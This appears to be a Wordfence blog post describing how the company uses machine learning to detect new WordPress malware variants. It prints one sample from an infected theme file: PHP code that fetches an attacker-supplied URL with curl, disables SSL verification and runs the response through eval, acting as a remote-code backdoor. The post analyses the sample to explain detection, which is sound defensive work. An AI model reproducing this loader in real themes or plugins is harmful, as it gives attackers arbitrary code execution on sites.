Wordfence Machine Learning Malware Identification

Machine Learning Gives Wordfence an Advantage

Wordfence is the leader in WordPress security, protecting over 4 million WordPress sites from malicious attacks. With new malware variants discovered daily, we now have a new weapon in our arsenal against WordPress attacks: Machine Learning.

How Wordfence identifies malware

For years, the Wordfence Threat Intelligence team has stayed ahead of attackers by quickly identifying new malware variants as they arise. In 2020 alone, our team identified 1,000,994 new malware files and rapidly deployed 957 malware signatures to detect them. These signatures identify and match patterns used by malware authors, alerting WordPress site owners when malware is found.

While most new samples are similar to malware we have seen before, a few occasionally elude our signatures, usually through evasive mutations in code. These are often found by our site cleaning team during forensic investigations.

Human identification of undetectable malware variants can be a tedious process, requiring testing and verification to ensure that our malware signatures accurately identify emerging malware, while at the same time ensuring that they do not trigger false positives on valid code used on millions of WordPress websites.

In an effort to more rapidly identify new and emerging malware, the Wordfence Threat Intelligence team has implemented machine learning to complement our team’s efforts.

What is machine learning?

Machine-learning is a class of computer algorithms that use training data to build a model that can recognize patterns in very large data sets. To effectively apply machine learning, it is important to have high quality training data.

The Wordfence team has, quite possibly, the largest collection of WordPress specific malware in the world. These malware samples have been carefully classified and curated, giving us an extremely high quality set of training data for our machine learning algorithms.

Machine learning powers a number of algorithms we experience daily. Recommended content on Netflix, Spotify or YouTube, for example, are powered by machine learning. These algorithms train on the media consumption patterns of millions of users and make predictions on what others may enjoy.

Using Machine Learning to Identify Emerging Malware

Malware is written for a wide variety of purposes, such as a backdoor, a spam injection, or a malicious redirect. WordPress-specific malware can be structured to hide itself in plain sight.

While malware can be found during scans, investigations, and maintenance, Wordfence’s work on machine learning has significantly shortened the time it takes to identify malware, such as the sample shown below.

Malware hidden in plain sight

error_reporting(0);
$ch = curl_init($_GET['url']);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
$output = curl_exec($ch);
eval ('?>'.$output);
$basepath = dirname(__FILE__);
 
function get_file($path) {
 
    if ( function_exists('realpath') )
        $path = realpath($path);
 
    if ( ! $path || ! @is_file($path) )
        return false;
 
    return @file_get_contents($path);
}

The sample above is an excerpt from what appears to be a theme file. Originally it may have been responsible for retrieving updates to theme files. But with this infection, it can also fetch a payload of malicious code, executing it on the infected site. This malware could be used to add malicious redirects, backdoors, spam files or spam links, or even to maintain persistent access to an infected site.

The malware is attempting to ‘hide in plain sight’ by disguising itself as little as possible. It contacts a web address via curl and executes the code it returns, allowing fresh malware to be deployed by an attacker on demand.

Premium software often includes “upgrade” and “installer” component scripts that behave similarly. The malicious code, while suspicious, would not be out of place in many premium WordPress themes or plugins, which is what makes it harder to identify.

Because this is a new variant, it did not match our existing malware patterns. On a manual inspection, a human analyst would quickly identify this as malware, but manually reviewing each new file is labor intensive and does not scale well. Machine learning automates this process and allows us to identify emerging malware variants far faster than even a large team of human analysts could.

Machine learning effectively multiplies our ability to make initial assessments, locating suspicious code without requiring a specific pattern or heuristic. This frees up our analysts so that they can focus their energy on more important human intelligence tasks, like deciding between a Nespresso or Keurig coffee machine for those late night investigations.

Once our machine learning algorithms have identified emerging malware such as the sample above, a Wordfence analyst verifies the finding, creates a new firewall rule if needed, and creates a new malware signature to detect the malware, which is then released to our Premium Wordfence customers in real-time.

Conclusion

Wordfence continues to evaluate new technologies. Back in 2015 we already had a custom built cluster of GPU processors in production to help our customers choose more secure passwords. Not all our experiments make it to production, but machine learning has emerged from a research project in our organization into a production technology that enables rapid identification of emerging malware threats.

We would like to give a special thanks to our WordPress Premium customers, who make this kind of cutting edge implementation possible. As malicious actors continue to target WordPress, Wordfence remains the leader in ensuring that the 4 million sites protected by Wordfence remain safe.

Special thanks to QA Engineer and Threat Analyst Ram Gall for his assistance with this blog post.

Did you enjoy this post? Share it!

Comments

1 Comment
  • It is not easy for individuals to trace malicious attacks through machine learning but only experts such as WordFence can. However, thanks to the team at WordFence for making us aware of such things and hope you will continue doing good to the WordPress community.